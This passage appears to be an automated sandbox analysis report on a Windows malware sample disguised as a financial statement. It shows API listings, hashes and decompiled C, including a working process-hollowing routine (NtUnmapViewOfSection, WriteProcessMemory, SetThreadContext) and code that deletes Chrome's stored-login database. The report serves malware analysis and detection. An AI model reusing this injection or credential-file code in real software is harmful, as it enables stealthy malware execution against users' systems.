                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                        • free.MSVCRT(?,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?), ref: 0040D643
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • open, xrefs: 0040D5BA
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040D636
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$open
                                        • API String ID: 2294739476-882194827
                                        • Opcode ID: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                        • Opcode Fuzzy Hash: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,69D65DF0), ref: 0041016E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                        • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                          • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                          • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                          • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                        • String ID:
                                        • API String ID: 1196022968-0
                                        • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                        • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403325, Relevance: 27.1, APIs: 18, Instructions: 109fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                        • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                        • String ID:
                                        • API String ID: 3638635289-0
                                        • Opcode ID: 98380c493d1ed2c942a3f7bfac615572d7a46575fa567749fd01e99bd99cf150
                                        • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                        • Opcode Fuzzy Hash: 98380c493d1ed2c942a3f7bfac615572d7a46575fa567749fd01e99bd99cf150
                                        • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F219, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0040F219() {
				void* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
									goto L16;
								} else {
									_t74 = 0;
									 *(_t115 - 0x64) = 0;
									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
										_t100 =  *(_t115 + 0xc);
										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
										_t74 =  *(_t115 - 0x64);
									}
									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
										goto L16;
									} else {
										_t80 =  *(_t115 - 0x70);
										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
											goto L16;
										} else {
											_t60 = 1;
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

















                                        0x0040f21e
                                        0x0040f229
                                        0x0040f22c
                                        0x0040f247
                                        0x0040f24a
                                        0x0040f24d
                                        0x0040f255
                                        0x0040f3c7
                                        0x0040f3c7
                                        0x0040f3cb
                                        0x0040f25b
                                        0x0040f25e
                                        0x0040f260
                                        0x0040f269
                                        0x00000000
                                        0x0040f26f
                                        0x0040f271
                                        0x0040f277
                                        0x0040f279
                                        0x0040f27e
                                        0x0040f27f
                                        0x0040f280
                                        0x0040f281
                                        0x0040f29c
                                        0x00000000
                                        0x0040f2a2
                                        0x0040f2b2
                                        0x0040f2b4
                                        0x0040f2b7
                                        0x0040f2c9
                                        0x00000000
                                        0x0040f2f1
                                        0x0040f2f1
                                        0x0040f2f7
                                        0x0040f2fc
                                        0x0040f2fc
                                        0x0040f30e
                                        0x0040f314
                                        0x0040f319
                                        0x00000000
                                        0x0040f33a
                                        0x0040f33a
                                        0x0040f33c
                                        0x0040f33f
                                        0x0040f34a
                                        0x0040f353
                                        0x0040f35a
                                        0x0040f371
                                        0x0040f373
                                        0x0040f376
                                        0x0040f376
                                        0x0040f396
                                        0x00000000
                                        0x0040f398
                                        0x0040f39e
                                        0x0040f3a1
                                        0x0040f3b3
                                        0x00000000
                                        0x0040f3c3
                                        0x0040f3c3
                                        0x0040f3c3
                                        0x0040f3b3
                                        0x0040f396
                                        0x0040f319
                                        0x0040f2c9
                                        0x0040f29c
                                        0x0040f269
                                        0x0040f3d0
                                        0x0040f3db

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 0040F21E
                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,73BCF560), ref: 0040F294
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                        • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                        • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                        • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                        • API String ID: 65594003-1050664331
                                        • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                        • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                        0x00407124
                                        0x0040712f
                                        0x00407136
                                        0x0040713a
                                        0x00407145
                                        0x0040714e
                                        0x0040715d
                                        0x004071b1
                                        0x004071b7
                                        0x004071bf
                                        0x004071c1
                                        0x004071c4
                                        0x00000000
                                        0x004071ca
                                        0x00407166
                                        0x00407167
                                        0x0040719c
                                        0x00407178
                                        0x0040717e
                                        0x00407184
                                        0x0040718f
                                        0x00000000
                                        0x00407195
                                        0x0040716a
                                        0x00407173
                                        0x00000000
                                        0x00407176
                                        0x0040716c
                                        0x00000000

                                        APIs
                                        • getenv.MSVCRT ref: 00407124
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                        • GetLastError.KERNEL32 ref: 0040715F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                        Strings
                                        • UserProfile, xrefs: 0040711F
                                        • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                        • [Chrome StoredLogins not found], xrefs: 00407179
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 3740952235-1062637481
                                        • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                        • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041203B, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                        0x00412048
                                        0x00412052
                                        0x0041205d
                                        0x0041207e
                                        0x00412087
                                        0x00412090
                                        0x00412094
                                        0x0041209d
                                        0x004120a1
                                        0x004120aa
                                        0x004120ae
                                        0x004120b8
                                        0x004120bf
                                        0x004120cb
                                        0x004120d4
                                        0x004120dd
                                        0x004120e6
                                        0x004120e6
                                        0x004120ef
                                        0x004120f8
                                        0x004120ff

                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00412052
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                        • printf.MSVCRT ref: 004120BF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: %02i:%02i:%02i:%03i $Q@
                                        • API String ID: 4249031962-3186260181
                                        • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                        • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412BEE, Relevance: 24.1, APIs: 16, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412BEE(wchar_t* _a4) {
				signed char _v5;
				void* _v12;
				short _v532;
				long _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				void* _t46;

				wcscpy( &_v1052, _a4);
